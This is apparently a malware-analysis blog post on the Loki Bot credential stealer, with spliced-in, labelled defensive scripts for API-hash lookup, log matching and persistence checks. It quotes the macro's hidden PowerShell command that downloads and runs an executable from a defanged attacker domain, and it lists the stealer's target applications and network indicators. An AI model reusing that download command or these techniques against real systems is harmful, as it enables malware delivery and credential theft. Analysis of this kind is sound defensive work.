A few hours after the "NotPetya" ransomware outbreak, several files began circulating as the supposed attack vector. Antimalware companies and malware research communities discussed domains and samples that had been linked to the attack.
For that reason I started analyzing the samples to get to the bottom of the matter. For your peace of mind, I must say that the samples are not related to the "NotPetya" ransomware; they belong to an interesting piece of malware, dubbed "Loki Bot", which I am going to explain.
Attack vector.
Loki Bot is an information stealer. It reads credentials and other private data from a long list of Windows programs and sends them to its CnC server.
The malware is sold on the internet with different modules and features.
As some malware researchers have said, the attack vector starts with a .doc file. This file exploits a known vulnerability (CVE-2017-0199) to download another file from a server (84.200.16.242/myguy.xls).
The downloaded .xls file has an embedded macro that downloads a binary from another server using PowerShell.
We can find the script by opening the .xls file with a hex editor.
After extracting the script and executing it, the script tries to download a .exe file from the french-cooking[.]com domain.
PowerShell command:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking[.]com/myguy[.]exe', 'C:\Users\d00rt\AppData\Roaming\45298.exe');
Finally, when myguy.exe is executed, it tries to connect to the CnC at coffeinoffice.xyz.
Let's see what happens with myguy.exe ;)
Loki Bot Analysis.
MD5 | A1D5895F85751DFE67D19CCCB51B051A |
SHA1 | 9288FB8E96D419586FC8C595DD95353D48E8A060 |
UNPACKING
This sample is protected with a custom packer, but in the end it uses the RunPE technique (process hollowing) to unpack itself; at that moment we can dump the unpacked image from memory and start a comfortable analysis.
Unpacked MD5 | 49F3606755B12230BFF639361C7109A7 |
Unpacked SHA1 | 234A7174E67EEC394FAF5139BC79C69BF0EBFFB8 |
WINDOWS API
This sample is not easy to analyze: it uses several techniques to make analysis harder. For example, to call any Windows API function it goes through a special resolver function instead of a normal import. To make it work, the malware pushes three values, and the resolver returns the memory address of the API function it is looking for.
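When a sample resolves API addresses through a routine like this, the analyst's job is to turn the constants the sample passes into function names. The following is an added example of that workflow, not code from the original post or from the malware: the post does not say what the three pushed values are or which hash the resolver uses, so the ROR13 hash over the export name and the export list are assumptions constructed for illustration only.

```python
# Added example (not from the original post): mapping hash constants found in a
# sample back to Windows API names, the usual step when a binary resolves APIs
# through a lookup routine instead of an import table.
#
# Assumptions, labelled: ROR13 over the ASCII export name is used purely as an
# illustration; the post does not identify LokiBot's real scheme. The export
# table below is constructed inline (a real run would enumerate the export
# directories of the DLLs the sample loads, e.g. with the pefile module).

def ror13_hash(name: str) -> int:
    """Rotate-right-13-then-add hash over the bytes of an export name (assumed hash)."""
    h = 0
    for b in name.encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF   # 32-bit rotate right by 13
        h = (h + b) & 0xFFFFFFFF
    return h

# Constructed export table: (module, function) pairs.
EXPORTS = [
    ("kernel32.dll", "CreateMutexA"),
    ("kernel32.dll", "SetFileAttributesA"),
    ("kernel32.dll", "CreateThread"),
    ("ws2_32.dll", "WSAStartup"),
    ("wininet.dll", "InternetOpenA"),
]

def build_hash_table(exports, hash_fn=ror13_hash) -> dict:
    """Precompute hash -> (module, function) for every known export."""
    return {hash_fn(func): (mod, func) for mod, func in exports}

def resolve(hashes, table) -> list:
    """Map each hash constant pulled from the sample to a name, or None if unknown."""
    return [table.get(h) for h in hashes]

if __name__ == "__main__":
    table = build_hash_table(EXPORTS)
    # Constants an analyst would copy out of the disassembly; here taken from the table.
    wanted = [ror13_hash("WSAStartup"), ror13_hash("CreateMutexA"), 0xDEADBEEF]
    for h, name in zip(wanted, resolve(wanted, table)):
        print(f"{h:#010x} -> {name}")
```

Once the real hash routine has been lifted from the resolver, swap it in for `ror13_hash` and feed the table with the full export lists of kernel32, ws2_32, wininet and the other DLLs the sample touches; every unresolved constant then points at a DLL you have not enumerated yet.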
Main functionality
Loki Bot calls WSAStartup, then creates a mutex whose name is derived from the MD5 of the machine GUID:
import hashlib

def loki_mutex_name(machine_guid: str) -> str:
    # MD5 of the MachineGuid string (read from HKLM\SOFTWARE\Microsoft\Cryptography),
    # truncated to the first 24 hex characters. ASCII encoding of the GUID is assumed.
    return hashlib.md5(machine_guid.encode("ascii")).hexdigest()[:24]
Later, Loki Bot collects sensitive information through the supported modules and sends it to the CnC.
After stealing the data it gains persistence on the system and finally waits for CnC commands in a loop.
SENSITIVE DATA
Loki Bot supports a lot of different Windows applications to steal information from. In the following table you can find all the modules that I could identify during the analysis.
Firefox | SoftwareNet | mSecure | Bitvise | 1Password |
IceDragon | FTPShell | vnc_files | WinFTP | Winbox |
Safari | NppFTP | BlazeFTP | MartinPrikryl | KDBX_files |
K_Meleon | MyFTP | FAStream_NetFile | FreshFTP | Enpass |
SeaMonkey | FTPBox | GoFTP | BitKinex | z_Mailing |
Flock | SherrodFTP | ESTSoft_FTP | UltraFXP | Opera_Mail |
Black_Hawk | FTPNow | DeluxeFTP | FTPNow2 | PostBox |
Lunascape | Nexus | TotalComander | VanDyke | FossaMail |
Comodo | XFTP | FTPGetter | OdinFTP | MailBox |
Opera | EasyFTP | WS_FTP | NCH_FLING | WinChips |
QtWeb | SFTP_NetDrive | FullTiltPoker | NCH_CLASSIC | Outlook |
QupZilla | AbleFTP | PokerStars | Kitty | YMail2 |
Vault | JaSFTP | ExpandDrive | ThunderBird | TrulyMail |
Cyberfox | Automize | Steed | FoxMail | spn_files |
Pale_Moon | Cyberduck | FlashFXP | PocoMail | TODODesktop |
WaterFox | FullSync | NovaFTP | IncrediMail | Stickies |
GoogleTark | FTPInfo | NetDrive | GmailNotifierPro | NoteFly |
SuperPutty | LinasFTP | TotalComander | dcf_files | Notezilla |
Syncovery | FileZilla | SmartFTP | 32BitFTP | StickyNotes |
FTPNavigato | StaffFTP | FarManager | RoboForm |
Loki Bot loads an array with the addresses of these modules and calls them dynamically.
During my analysis, the malware got my Gmail account data from the Comodo Dragon browser and the FileZilla config. (Look at the stolen data: you can see passwords in plain text :O )
Once Loki Bot has finished stealing data, it prepares a packet to send to the CnC. The data is compressed by an algorithm.
The original data size was 0x2541 bytes; after compression it is 0xB27 bytes.
The malware collects computer metadata to tie the stolen data to the machine it was taken from. This metadata forms the header of the packet sent to the CnC, together with some flags (total data size, stolen data size for each module, ...) which I am not going to explain in depth in this post.
In the next image we see the final payload to be sent to the CnC and the CnC domain:
HTTP request (I patched the host to see the request because the real server is down). It uses "Mozilla/4.08 (Charon; Inferno)" as User-Agent.
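The fixed User-Agent and the hosts named above are the network indicators a defender can act on. The block below is an added example, not part of the original post: it runs those indicators over a few constructed proxy-log entries (one JSON object per line with `src`, `method`, `host`, `uri`, `ua`; that format is an assumption of the example, not a LokiBot artifact) and reports what each entry matched. The request paths in the sample lines are constructed too; the post does not record the CnC URI.

```python
# Added example (not from the original post): match proxy/web-log entries against
# the LokiBot network indicators reported in the analysis.
import json

# Indicators from the post. Domains are written undefanged here so they match logs.
LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
IOC_HOSTS = {
    "84.200.16.242",        # served myguy.xls
    "french-cooking.com",   # served myguy.exe
    "coffeinoffice.xyz",    # CnC contacted by myguy.exe
}

# Constructed log lines standing in for a real proxy export.
SAMPLE_LOG = """\
{"src": "10.0.0.12", "method": "GET",  "host": "84.200.16.242",      "uri": "/myguy.xls", "ua": "Microsoft Office/14.0"}
{"src": "10.0.0.12", "method": "GET",  "host": "french-cooking.com", "uri": "/myguy.exe", "ua": "Mozilla/5.0"}
{"src": "10.0.0.12", "method": "POST", "host": "coffeinoffice.xyz",  "uri": "/",          "ua": "Mozilla/4.08 (Charon; Inferno)"}
{"src": "10.0.0.30", "method": "GET",  "host": "example.org",        "uri": "/",          "ua": "Mozilla/5.0"}
"""

def match_loki_indicators(line: str) -> list:
    """Return the indicator names a single log entry matches (empty list if clean)."""
    rec = json.loads(line)
    hits = []
    if rec.get("ua") == LOKI_USER_AGENT:
        hits.append("user_agent")
    if rec.get("host", "").lower() in IOC_HOSTS:
        hits.append("ioc_host")
    # A POST carrying the LokiBot agent is the check-in / exfiltration shape the post describes.
    if rec.get("method") == "POST" and "user_agent" in hits:
        hits.append("checkin_post")
    return hits

def scan_log(text: str) -> list:
    """Return (src, host, hits) for every entry that matched at least one indicator."""
    results = []
    for line in text.splitlines():
        if not line.strip():
            continue
        hits = match_loki_indicators(line)
        if hits:
            rec = json.loads(line)
            results.append((rec["src"], rec["host"], hits))
    return results

if __name__ == "__main__":
    for src, host, hits in scan_log(SAMPLE_LOG):
        print(f"{src} -> {host}: {', '.join(hits)}")
```

The User-Agent match is the durable part of this check: the hosts rotate between campaigns, but the hard-coded agent string identifies the bot's own HTTP client regardless of which CnC it is pointed at, so a `checkin_post` hit to an unknown host is worth treating as a new CnC candidate rather than noise.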
Finally, Loki Bot stays in a loop waiting for commands from the CnC: it sends the CnC a "clean" packet (just the metadata header we saw previously). If the CnC responds to the request, Loki Bot creates a thread to parse the CnC answer.
I analyzed this part statically because the server is down, so some parts are not clear, but I found different behaviours depending on the CnC response.
1. The CnC can ask the bot to steal sensitive data again.
2. The CnC can ask the compromised computer to download, execute and load files and libraries.
Basically, Loki Bot can do whatever the operator wants: it could perform backdoor tasks or update itself with new features.
PERSISTENCE
Loki Bot copies itself into the following folder and hides it: "C:\Users\d00rt\AppData\Roaming\72431D". The malware sets the folder and file attributes using SetFileAttributes with the value 0x2006:
Flag | Attribute |
---|---|
0x2 | FILE_ATTRIBUTE_HIDDEN |
0x4 | FILE_ATTRIBUTE_SYSTEM |
0x2000 | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED |
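The combination of hidden, system and not-content-indexed on a directory directly under %APPDATA% is unusual for legitimate software, which makes the attribute mask itself a cheap host-side check. The block below is an added example, not part of the original post: it decodes the mask and hunts the Roaming folder for directories carrying that combination. The flag values are the documented Win32 constants; the sample entries are constructed, and the folder name 72431D is the one from the post's analysis machine, not a fixed LokiBot indicator.

```python
# Added example (not from the original post): decode the SetFileAttributes mask
# LokiBot applies (0x2006) and look for directories under %APPDATA% that carry it.
import os
import sys

FILE_ATTRIBUTE_HIDDEN = 0x2
FILE_ATTRIBUTE_SYSTEM = 0x4
FILE_ATTRIBUTE_DIRECTORY = 0x10
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED = 0x2000
LOKI_ATTR_MASK = (FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM
                  | FILE_ATTRIBUTE_NOT_CONTENT_INDEXED)   # == 0x2006

ATTRIBUTE_NAMES = {
    FILE_ATTRIBUTE_HIDDEN: "FILE_ATTRIBUTE_HIDDEN",
    FILE_ATTRIBUTE_SYSTEM: "FILE_ATTRIBUTE_SYSTEM",
    FILE_ATTRIBUTE_DIRECTORY: "FILE_ATTRIBUTE_DIRECTORY",
    FILE_ATTRIBUTE_NOT_CONTENT_INDEXED: "FILE_ATTRIBUTE_NOT_CONTENT_INDEXED",
}

def decode_attributes(mask: int) -> list:
    """Split an attribute mask into the named flags it contains."""
    return [name for bit, name in ATTRIBUTE_NAMES.items() if mask & bit]

def has_loki_attributes(mask: int) -> bool:
    """True when hidden, system and not-content-indexed are all set (other bits ignored)."""
    return mask & LOKI_ATTR_MASK == LOKI_ATTR_MASK

def find_suspicious_dirs(entries) -> list:
    """entries: iterable of (path, attribute_mask). Returns (path, mask) for matches."""
    return [(path, mask) for path, mask in entries if has_loki_attributes(mask)]

def walk_roaming():
    """Yield (path, attributes) for each top-level directory under %APPDATA%. Windows only."""
    root = os.environ.get("APPDATA")
    if not root or not sys.platform.startswith("win"):
        return
    for name in os.listdir(root):
        path = os.path.join(root, name)
        if os.path.isdir(path):
            yield path, os.stat(path).st_file_attributes

# Constructed entries standing in for walk_roaming() output. A directory stat
# reports 0x10 in addition to what SetFileAttributes set, hence 0x2016.
SAMPLE_ENTRIES = [
    (r"C:\Users\d00rt\AppData\Roaming\72431D", 0x2016),
    (r"C:\Users\d00rt\AppData\Roaming\Microsoft", 0x10),   # plain directory
    (r"C:\Users\d00rt\AppData\Roaming\Mozilla", 0x2010),   # not-content-indexed only
]

if __name__ == "__main__":
    entries = list(walk_roaming()) or SAMPLE_ENTRIES
    for path, mask in find_suspicious_dirs(entries):
        print(f"{path}: {mask:#06x} = {' | '.join(decode_attributes(mask))}")
```

Because the check is a subset test on the mask, it still fires when the directory bit or other flags are set alongside the three the malware applies; pair a hit with the mutex name derived from the MachineGuid MD5 above to confirm rather than relying on the random folder name.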
Author: @D00RT